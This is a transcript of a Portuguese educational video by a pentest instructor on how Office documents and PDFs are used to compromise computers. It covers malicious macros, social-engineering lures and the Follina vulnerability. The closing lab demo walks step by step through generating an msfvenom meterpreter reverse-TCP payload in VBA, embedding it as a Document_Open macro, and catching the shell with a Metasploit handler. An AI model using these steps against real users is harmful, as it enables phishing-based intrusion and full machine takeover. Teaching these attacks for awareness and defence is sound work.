Você pode ser hackeado apenas abrindo um PDF. Imagina só, você recebe um e-mail com um documento, clica, abre e pronto. Seu computador foi completamente hackeado. Será que isso é possível? E olha só, eu já te adianto. É possível comprometer um computador apenas com um simples documento. Muito prazer, eu sou Luiz Viana, especialista em Hacking Pentest. Neste vídeo eu vou te mostrar como os documentos podem ser utilizados para invasão. Vamos falar das macros, das vulnerabilidades que levam até ataques como esses e, obviamente, vamos ver tudo isso na prática. Lembrando que esse conteúdo é 100% educacional, beleza? Então vamos lá. Então, primeiro de tudo, como que um documento pode virar um vetor de ataque? Aqui a gente está falando de PDF, um arquivo Word, Excel, PowerPoint, como que é possível esse ataque? Bom, esse tipo de ataque combina engenharia social com funcionalidades do próprio documento ou falhas nos programas que processam esses documentos. Tudo isso para levar à execução de código na máquina da vítima. Ou seja, o documento não é só texto. Tem algo embutido nele ali que vai ser interpretado pelo software de leitura e levar ao comprometimento da máquina. Os hackers normalmente enviam e-mails com esses documentos maliciosos em anexo e, na prática, assim que o documento é aberto, esse código oculto é executado e faz uma conexão reversa com a máquina do hacker. E um dos métodos mais comuns para esse tipo de ataque envolve as famosas macros em documentos do Microsoft Office. As macros são pequenos programas em Visual Basic embutidos em arquivos do Word, Excel, PowerPoint, e elas são usadas originalmente para automatizar tarefas. Por exemplo, para atualizar uma planilha, gerar relatórios, inserir formatações, enfim. Em teoria, a macro ajuda o usuário. O problema é que por debaixo dos panos, uma macro nada mais é do que um programa rodando dentro do documento. Então o hacker pode escrever uma macro maliciosa. E como ela tem acesso ao sistema operacional, esse código ele pode fazer praticamente qualquer coisa. Apagar arquivos, modificar arquivos, baixar e instalar algum malware, um ransomware, roubar credenciais da máquina, tirar screenshot, ligar a câmera, ou até dar acesso total daquela máquina ao hacker. Inclusive, antigamente esses ataques com macros eram muito comuns. Hoje os aplicativos do Office já trazem algumas proteções. Por exemplo, as macros já vêm desabilitadas por padrão. Sempre que você baixa um documento de uma outra fonte, aparece ali no aplicativo um aviso dizendo que as macros foram desabilitadas, com opção para você habilitar o conteúdo, modo edição ou habilitar as macros. A Microsoft decidiu bloquear as macros por padrão justamente para barrar esse tipo de ataque. Então, atualmente, para uma macro maliciosa funcionar, o usuário tem que ir lá e habilitar quando o Office exibiu o aviso de segurança. Mas aí entra a engenharia social. Alguns documentos abrem uma mensagem dizendo que o documento foi criado uma versão diferente, então precisa habilitar a macro para visualizar ele todo, ou ativar ali para ver todo o conteúdo do documento. Então, se a vítima habilitar, aí o código malicioso é executado. Por isso a dica básica é nunca habilitar macros em documentos duvidosos. Mesmo assim, muita gente habilita e acaba sendo infectado. Inclusive, há poucos anos houve vários casos de canais do YouTube hackeados em que os hackers utilizavam exatamente essa técnica. Eles enviavam propostas de patrocínio falsas para o YouTuber com documento Word, tendo briefing de uma campanha ou mais informações, algo assim, e quando o cara abria aquilo ali no computador, o código malicioso ia lá e roubava a seção do YouTube do navegador. Então os hackers conseguiam assumir controle total do canal, sem precisar da senha, sem precisar do duplo fator de autenticação. Muita gente caiu nesse ataque. Mas beleza, a gente já falou das macros, mas sobre os PDFs. Um PDF, teoricamente, é apenas um documento para leitura. Ele não tem macro, não tem scripts por padrão. Então, seria possível infectar uma máquina a partir de um PDF? E, novamente, a resposta é sim. Os PDFs podem também ser utilizados para invasão, mas de uma forma um pouco diferente, através das vulnerabilidades nos softwares que vão ler aquele PDF. Ou seja, mesmo que o PDF em si não carregue uma macro ou um programa, ele pode ser construído para explorar uma vulnerabilidade no Adobe Reader, no Word ou em qualquer outro programa que você utilize para abrir o arquivo, até no seu próprio navegador. Em 2018, por exemplo, foram encontradas vulnerabilidades dessas no Adobe Reader. Abrindo um simples PDF, era possível executar comandos. Outro caso recente muito grave foi a vulnerabilidade conhecida como Folina. Ela foi catalogada com a CVE 2022-30190. Essa vulnerabilidade explorava a ferramenta de diagnóstico da Microsoft, o MSDT. Através de um documento do Office, um DocX, por exemplo, era possível infectar uma máquina mesmo com as macros desabilitadas. Os hackers manipulavam o DocX para acionar o MSDT através de um recurso chamado de Remote Template. Funciona assim: o documento tinha um link malicioso que, ao ser aberto, fazia o Word baixar o arquivo HTML do servidor do hacker, e esse HTML chamava a ferramenta de diagnóstico do Windows, passando alguns parâmetros maliciosos. Então, ao abrir aquele DocX, o Word automaticamente puxava um código externo e mandava para execução através do MSDT. Mais uma vez, código malicioso executado na máquina da vítima,
sem nenhum prompt ou alerta na tela. A pessoa não precisava habilitar nada. Mesmo até com o modo protegido de visualização dos documentos, era possível executar esse exploit. Em alguns casos, bastava só visualizar o arquivo na pré-visualização do Windows para disparar o ataque. Ou seja, você não precisava nem acessar o arquivo completamente para ser comprometido. Obviamente, essa falha foi utilizada em vários ataques no mundo inteiro. Ela foi corrigida somente em junho de 2022. Mas, novamente, corrigida só nos sistemas atualizados. Muitas máquinas ainda estão vulneráveis. E a Follina não foi a única e provavelmente não será a última falha desse tipo. Várias falhas críticas são exploradas em ferramentas como Adobe Reader, por exemplo. Por isso que é importante manter seus softwares atualizados. Claro que também um antivírus, um EDR também ajuda a detectar e barrar esses ataques. Mas enfim, chega de teoria e vamos ver na prática como um documento pode ser utilizado para invadir um sistema. Mas antes disso, eu tenho uma dica para você. Se você quer se tornar um hacker profissional, mesmo que você não saiba nada agora, na SolidOne, com uma única assinatura, você tem acesso a absolutamente tudo que você precisa. São dezenas de cursos, dezenas de laboratórios práticos, campeonatos internos valendo prêmio em dinheiro, certificações práticas reconhecidas, comunidade, suporte diretamente comigo e com os outros instrutores da Solid, tudo que você precisa para se tornar um profissional extremamente qualificado e certificado em segurança ofensiva. Então vou deixar um link no comentário fixado, dá uma olhada lá. Beleza? Então vamos lá. Primeiro passo é a gente gerar o nosso código malicioso. E a gente vai realizar isso utilizando o MSF Venom. Eu já estou aqui no Kali Linux, eu vou utilizar o MSF Venom. Vou passar aqui o payload Windows x64 /metterpreter/reverse TCP. O lhost, vou passar o meu IP, que no caso aqui é o 92.168.1.8. Lport, vou passar 4444. E aqui um ponto importante, o formato do nosso código malicioso é VBA, que é justamente as linguagens das macro. Vou dar um Enter aqui e olha só, ele vai gerar todo o meu código malicioso. Eu vou copiar isso aqui e no meu Windows eu vou criar um arquivo Word com essa macro. Beleza? Estou aqui no meu Windows, eu vou abrir o Word, beleza? Vou criar aqui um documento vazio, esse aqui vai ser o meu documento de teste, então vou colocar aqui, sei lá, informação ultra secreta. Beleza, eu vou clicar aqui em macro, vou criar uma nova, vou selecionar aqui Document 2, Create, vou colocar aqui todo o meu código e ao invés de Workbook Open, que seria o que a gente utilizaria se a gente estivesse criando aqui uma macro numa planilha do Excel, a gente vai colocar Document Open. Vamos salvar, vou selecionar aqui o Word 97/2003 Document, salvar, e eu tenho aqui meu documento, vou passar ele aqui para o desktop. Beleza? Tá ali, informação ultra secreta. E eu vou, no meu Kali Linux, iniciar um listener. MSF console, use multi /handler, set payload Windows x64 reverse _TCP, x64 metterpreter reverse _TCP, lhost, vou colocar aqui 0.0.0.0, lport vai ser 4444. E vou dar um exploit aqui para esperar a conexão. Nesse momento, eu vou abrir o documento lá no Windows. Olha só, estou com o Kali Linux aqui e o Windows logo aqui embaixo. Eu vou simplesmente clicar no documento. Ele vai abrir. Olha só, Security Warning. Vou habilitar ali a macro. Beleza. E olha só, acabei de receber uma conexão aqui no meu Kali Linux. Acabei de comprometer completamente essa máquina utilizando um DocX. Enfim, esse aqui foi um exemplo simples, mas eu acho que deu para ficar claro que é sim possível invadir máquinas utilizando documentos. Tenho certeza que agora você vai tomar muito mais cuidado antes de abrir um anexo que você receber por e-mail.